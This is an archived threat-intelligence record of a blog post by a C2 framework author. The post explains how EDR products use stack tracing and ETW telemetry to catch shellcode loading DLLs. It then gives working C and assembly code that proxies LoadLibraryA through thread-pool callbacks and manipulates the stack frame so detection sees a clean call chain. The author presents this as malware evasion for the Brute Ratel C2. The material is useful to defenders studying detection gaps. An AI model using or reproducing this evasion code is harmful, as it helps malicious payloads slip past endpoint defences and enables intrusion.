{
	"id": "eb9cb183-69d7-45d7-8db5-1b43285dedf9",
	"created_at": "2026-04-06T00:07:04.658309Z",
	"updated_at": "2026-04-10T03:21:05.767612Z",
	"deleted_at": null,
	"sha1_hash": "3ff4e1afb56f452436f9e6209a4b246fe3094dc3",
	"title": "Hiding In PlainSight - Proxying DLL Loads To Hide From ETWTI Stack Tracing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 431255,
	"plain_text": "Hiding In PlainSight - Proxying DLL Loads To Hide From ETWTI\r\nStack Tracing\r\nArchived: 2026-04-05 17:50:36 UTC\r\nPosted on 26 Jan 2023 by Paranoid Ninja\r\nNOTE: This is a PART I blog on Stack Tracing evasion. PART II can be found here.\r\nBeen a while since I actually wrote any blog on Dark Vortex (not counting the Brute Ratel ones, just raw\r\nresearch), thus I decided to add the post here. This blog provides a high level overview on stack tracing, how\r\nEDR/AVs use it for detections, the usage of ETWTI telemetry and what can be done to evade it. Last year, I\r\nposted a blog on Brute Ratel which was the first Command \u0026 Control to provide built-in proxying of DLL loads\r\nto avoid detections, which was later on adopted by other C2s like nighthawk with a different set of APIs\r\n( RtlQueueWorkItem ) to avoid detections. Thus, before we discuss evasion, lets first understand why stack tracing\r\nis important for EDRs.\r\nWhat Is A Stack?\r\nThe simplest way to describe a ‘Stack’ in computer science, is a temporary memory space where local variables\r\nand function arguments are stored with non-executable permissions. This stack can contain several information\r\nabout a thread and the function in which it is being executed. Whenever your process executes a new thread, a\r\nnew stack is created. Stack grows from bottom to top and works in linear fashion, which means it follows the Last\r\nIn, First Out principal. The ‘RSP’ (x64) or ‘ESP’ (x86) stores the current stack pointer of the thread. Each new\r\ndefault stack size for a thread in windows is of 1 Megabyte unless explicitly changed by the developer during the\r\ncreation of the thread. This means, if the developer does not calculate and increase the stack size while coding, the\r\nstack might end up hitting the stack boundary (alternative known as stack canary) and raise an exception. Usually,\r\nit is the task of the _chkstk routine within msvcrt.dll to probe the stack, and raise an exception if more stack is\r\nrequired. Thus if you write a position independent shellcode which requires a large stack (as everything in PIC is\r\nstored on stack), your shellcode will crash raising an exception since your PIC will not be linked to the _chkstk\r\nroutine within msvcrt.dll. When your thread starts, your thread might contain execution of several functions and\r\nusage of various different types of variables. Unlike heap, which needs to be allocated and freed manually, we\r\ndont have to manually calculate the stack. When the compiler (mingw gcc or clang) compiles the C/C++ code, it\r\nauto calculates the stack required and adds the required instruction in the code. Thus when your thread is run, it\r\nwill first allocate the ‘x’ size on stack from the reserved stack of 1 MB. Take the below example for this instance:\r\nvoid samplefunction() {\r\n char test[8192];\r\n}\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 1 of 8\n\nIn the above function, we are simply creating a variable of 8192 bytes, but this will not be stored within the PE as\r\nit will unnecessarily end up eating space on disk. Thus such variables are optimized by compilers and converted to\r\ninstructions such as:\r\nsub rsp, 0x2000\r\nThe above assembly code subtracts 0x2000 bytes (8192 decimal) from stack which will be utilized by the function\r\nduring runtime. In short, if your code needs to clean up some stack space, it will add bytes to stack, whereas if it\r\nrequires some stack space, it will subtract from the stack. Each function’s stack within the thread will be converted\r\nto a block which is called as stack frame. Stack frames provide a clear and concise view of which function was\r\nlast called, from which area in memory, how much stack is being used by that frame, what are the variables stored\r\nin the frame and where the current function needs to return to. Everytime your function calls another function,\r\nyour current function’s address is pushed to stack, so that when the next function calls ‘ret’ or return, it returns to\r\nthe current function’s address to continue execution. Once your current function returns to the previous function,\r\nthe stack frame of the current function gets destroyed, not completely though, it can still be accessed, but mostly\r\nends up being overwritten by the next function which gets called. To explain it like I would to a 5 year old, it\r\nwould go like this:\r\nvoid func3() {\r\n char test[2048];\r\n \r\n return;\r\n}\r\nvoid func2() {\r\n char test[4096];\r\n func3();\r\n}\r\nvoid func1() {\r\n char test[8192];\r\n func2();\r\n}\r\nThe above code gets converted to assembly like this:\r\nfunc3:\r\n sub rsp, 0x800\r\n \r\n add rsp, 0x800\r\n ret\r\nfunc2:\r\n sub rsp, 0x1000\r\n call func3\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 2 of 8\n\nadd rsp, 0x1000\r\n ret\r\nfunc1:\r\n sub rsp, 0x2000\r\n call func2\r\n add rsp, 0x2000\r\n ret\r\nWell, a 5 year old wont understand it, but when do you find a 5 year old writing a malware right? XD! Thus, each\r\nstack frame will contain the number of bytes to allocate for variables, return address which pushed to stack by the\r\nprevious function and information about current function’s local variables (in a nut shell).\r\nWheres THE ‘D’ in EDR here?\r\nThe technique for detection is extremely smart here. Some EDRs use userland hooks, whereas some use ETW to\r\ncapture the stack telemetry. For example, say you want to execute your shellcode without module stomping. So,\r\nyou allocate some memory via VirtualAlloc or the relative NTAPI NtAllocateVirtualMemory, then copy your\r\nshellcode and execute it. Now your shellcode might have its own dependencies and it might call LoadLibraryA\r\nor LdrLoadDll to load a dll from disk into memory. If your EDR uses userland hooks, they might have already\r\nhooked LoadLibrary and LdrLoadDll , in which case they can check the return address pushed to stack by your\r\nRX shellcode region. This is specific to some EDRs like Sentinel One, Crowdstrike etc. which will instantly kill\r\nyour payload. Other EDRs like Microsoft Defender ATP (MDATP), Elastic, FortiEDR will use ETW or kernel\r\ncallbacks to check where the LoadLibrary call originated from. The stack trace will provide a complete stack\r\nframe of return address and all the functions from where the call to LoadLibrary started. In short, if you execute\r\na DLL Sideload which executes your shellcode which called LoadLibrary , it would look like this:\r\n|-----------Top Of The Stack-----------|\r\n| |\r\n| |\r\n|--------------------------------------|\r\n|------Stack Frame of LoadLibrary------|\r\n| Return address of RX on disk |\r\n| |\r\n|----------Stack Frame of RX-----------| \u003c- Detection (An unbacked RX region should never call LoadLibraryA)\r\n| Return address of PE on disk |\r\n| |\r\n|-----------Stack Frame of PE----------|\r\n| Return address of RtlUserThreadStart |\r\n| |\r\n|---------Bottom Of The Stack----------|\r\nThis means any EDR which hooks LoadLibrary in usermode or via kernel callbacks/ETW, can check the last\r\nreturn address region or where the call came from. In the v1.1 release of BRc4, I started using the\r\nRtlRegisterWait API which can request a worker thread in thread pool to execute LoadLibraryA in a seperate\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 3 of 8\n\nthread to load the library. Once the library is loaded, we can extract its base address by simply walking the PEB\r\n(Process Environment Block). Nighthawk later adopted this technique to RtlQueueWorkItem API which is the\r\nmain NTAPI behind QueueUserWorkItem which can also queue a request to a worker thread to load a library with\r\na clean stack. However this was researched by Proofpoint sometime last year in their blog, and lately Joe\r\nDesimone from Elastic also posted a tweet about the RtlRegisterWait API being used by BRc4. This meant\r\nsooner or later, detections would come around it and there were need of more such APIs which can be used for\r\nfurther evasion. Thus I decided to spend some time reversing some undocumented APIs from ntdll and found\r\natleast 27 different callbacks which, with a little tweaking and hacking can be exploited to load our DLL with\r\na clean stack.\r\nWindows Callbacks: Allow Us To Introduce Ourselves\r\nCallback functions are pointers to a function which can be passed on to other functions to be executed inside\r\nthem. Microsoft provides an insane amount of callbacks for software developers to execute code via other\r\nfunctions. A lot of these functions can be found in this github repository which have been exploited quite widely\r\nsince the past two years. However there is a major issue with all those callbacks. When you execute a callback,\r\nyou dont want the callback to be in the same thread as of your caller thread. Which means, you dont want stack\r\ntrace to follow a trail like: LoadLibrary returns to -\u003e Callback Function returns to -\u003e RX region . In order\r\nto have a clean stack, we need to make sure our LoadLibrary executes in a seperate thread independent of our RX\r\nregion, and if we use callbacks, we need the callbacks to be able to pass proper parameters to LoadLibraryA .\r\nMost callbacks in Windows, either dont have parameters, or dont forward the parameters ‘as is’ to our target\r\nfunction ‘LoadLibrary’. Take an example of the below code:\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nint main() {\r\n CHAR *libName = \"wininet.dll\";\r\n PTP_WORK WorkReturn = NULL;\r\n TpAllocWork(\u0026WorkReturn, LoadLibraryA, libName, NULL);\r\n TpPostWork(WorkReturn);\r\n TpReleaseWork(WorkReturn);\r\n WaitForSingleObject((HANDLE)-1, 1000);\r\n printf(\"hWininet: %p\\n\", GetModuleHandleA(libName));\r\n return 0;\r\n}\r\nIf you compile and run the above code, it will crash. The reason being the definition of TpAllocWork is:\r\nNTSTATUS NTAPI TpAllocWork(\r\n PTP_WORK* ptpWrk,\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 4 of 8\n\nPTP_WORK_CALLBACK pfnwkCallback,\r\n PVOID OptionalArg,\r\n PTP_CALLBACK_ENVIRON CallbackEnvironment\r\n);\r\nThis means our callback function LoadLibraryA should be of type PTP_WORK_CALLBACK. This type\r\nexpands to:\r\nVOID CALLBACK WorkCallback(\r\n PTP_CALLBACK_INSTANCE Instance,\r\n PVOID Context,\r\n PTP_WORK Work\r\n);\r\nAs can be seen in the above figure, our PVOID OptionalArg from TpAllocWork API gets forwarded as\r\nsecondary argument to our Callback ( PVOID Context ). So if our hypothesis is correct, the argument libName\r\n(wininet.dll) that we passed to TpAllocWork will end up as a second argument to our LoadLibraryA . But\r\nLoadLibraryA DOES NOT have a second argument. Checking this in debugger leads to the following image:\r\nSo this indeed created a clean stack like: LoadLibraryA returns to -\u003e TpPostWork returns to -\u003e\r\nRtlUserThreadStart , but our argument for LoadLibrary gets sent as the second argument, whereas the first\r\nargument is a pointer to a TP_CALLBACK_INSTANCE structure sent by the TpPostWork API. After a bit more\r\nreversing, I found that this structure is dynamically generated by the TppWorkPost (NOT TpPostWork ), which\r\nas expected is an internal function of ntdll.dll and nothing much can be done without having the debug symbols\r\nfor this API.\r\nHowever, all hope is not yet lost. One of the dirty tricks we can try is to replace a Callback function from\r\nLoadLibrary to a custom function in TpAllocWork which then calls LoadLibraryA via our callback.\r\nSomething like this:\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 5 of 8\n\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nVOID CALLBACK WorkCallback(\r\n _Inout_PTP_CALLBACK_INSTANCE Instance,\r\n _Inout_opt_PVOID Context,\r\n _Inout_PTP_WORK Work\r\n) {\r\n LoadLibraryA(Context);\r\n}\r\nint main() {\r\n CHAR *libName = \"wininet.dll\";\r\n PTP_WORK WorkReturn = NULL;\r\n TpAllocWork(\u0026WorkReturn, WorkerCallback, libName, NULL);\r\n TpPostWork(WorkReturn);\r\n TpReleaseWork(WorkReturn);\r\n WaitForSingleObject((HANDLE)-1, 1000);\r\n printf(\"hWininet: %p\\n\", GetModuleHandleA(libName));\r\n return 0;\r\n}\r\nHowever this means, the callback will be in our RX region and the stack would become: LoadLibraryA returns\r\nto -\u003e Callback in RX Region returns to -\u003e RtlUserThreadStart -\u003e TpPostWork which is not good as we\r\nended up doing the same thing we were trying to avoid. The reason for this is stack frame. Because when we call\r\nLoadLibraryA from our Callback in RX Region , we end up pushing the return address of the Callback in RX\r\nRegion on stack which ends up becoming a part of the stack frame. However, what if we manipulate the stack to\r\nNOT PUSH THE RETURN ADDRESS? Sure, we will have to write a few lines in assembly, but this should solve\r\nour issue entirely and we can have a direct call from TpPostWork to LoadLibrary without having the intricacies\r\nin between.\r\nThe Final Trick\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\ntypedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID Option\r\ntypedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);\r\ntypedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);\r\nFARPROC pLoadLibraryA;\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 6 of 8\n\nUINT_PTR getLoadLibraryA() {\r\n return (UINT_PTR)pLoadLibraryA;\r\n}\r\nextern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);\r\nint main() {\r\n pLoadLibraryA = GetProcAddress(GetModuleHandleA(\"kernel32\"), \"LoadLibraryA\");\r\n FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA(\"ntdll\"), \"TpAllocWork\");\r\n FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA(\"ntdll\"), \"TpPostWork\");\r\n FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA(\"ntdll\"), \"TpReleaseWork\");\r\n CHAR *libName = \"wininet.dll\";\r\n PTP_WORK WorkReturn = NULL;\r\n ((TPALLOCWORK)pTpAllocWork)(\u0026WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, libName, NULL);\r\n ((TPPOSTWORK)pTpPostWork)(WorkReturn);\r\n ((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);\r\n WaitForSingleObject((HANDLE)-1, 0x1000);\r\n printf(\"hWininet: %p\\n\", GetModuleHandleA(libName));\r\n return 0;\r\n}\r\nASM Code for rerouting WorkCallback to LoadLibrary by manipulating the stack frame\r\nsection .text\r\nextern getLoadLibraryA\r\nglobal WorkCallback\r\nWorkCallback:\r\n mov rcx, rdx\r\n xor rdx, rdx\r\n call getLoadLibraryA\r\n jmp rax\r\nNow if you compile both of them together, our TpPostWork calls WorkCallback , but WorkCallback does not\r\ncall LoadLibraryA , it instead jumps to its pointer. WorkCallback simply moves the library name in the RDX\r\nregister to RCX , erases RDX , gets the address of LoadLibraryA from an adhoc function and then jumps to\r\nLoadLibraryA which ends up rearranging the whole stack frame without adding our return address. This ends up\r\nmaking the stack frame look like this:\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 7 of 8\n\nThe stack is clear as crystal with no signs of anything malevolent. After finding this technique, I started hunting\r\nsimilar other APIs which can be manipulated, and found that with just a little bit of similar tweaks, you can\r\nactually implement proxy DLL loads with 27 other Callbacks residing in kernel32, kernelbase and ntdll. I will\r\nleave it out as an exercise for the readers of this blog to figure that out. For the users of Brute Ratel, you will find\r\nthese updates in the next release v1.5. That would be all for this blog and the full code can be found in my github\r\nrepository.\r\nSource: https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/"
	],
	"report_names": [
		"proxying-dll-loads-for-hiding-etwti-stack-tracing"
	],
	"threat_actors": [],
	"ts_created_at": 1775434024,
	"ts_updated_at": 1775791265,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3ff4e1afb56f452436f9e6209a4b246fe3094dc3.pdf",
		"text": "https://archive.orkl.eu/3ff4e1afb56f452436f9e6209a4b246fe3094dc3.txt",
		"img": "https://archive.orkl.eu/3ff4e1afb56f452436f9e6209a4b246fe3094dc3.jpg"
	}
}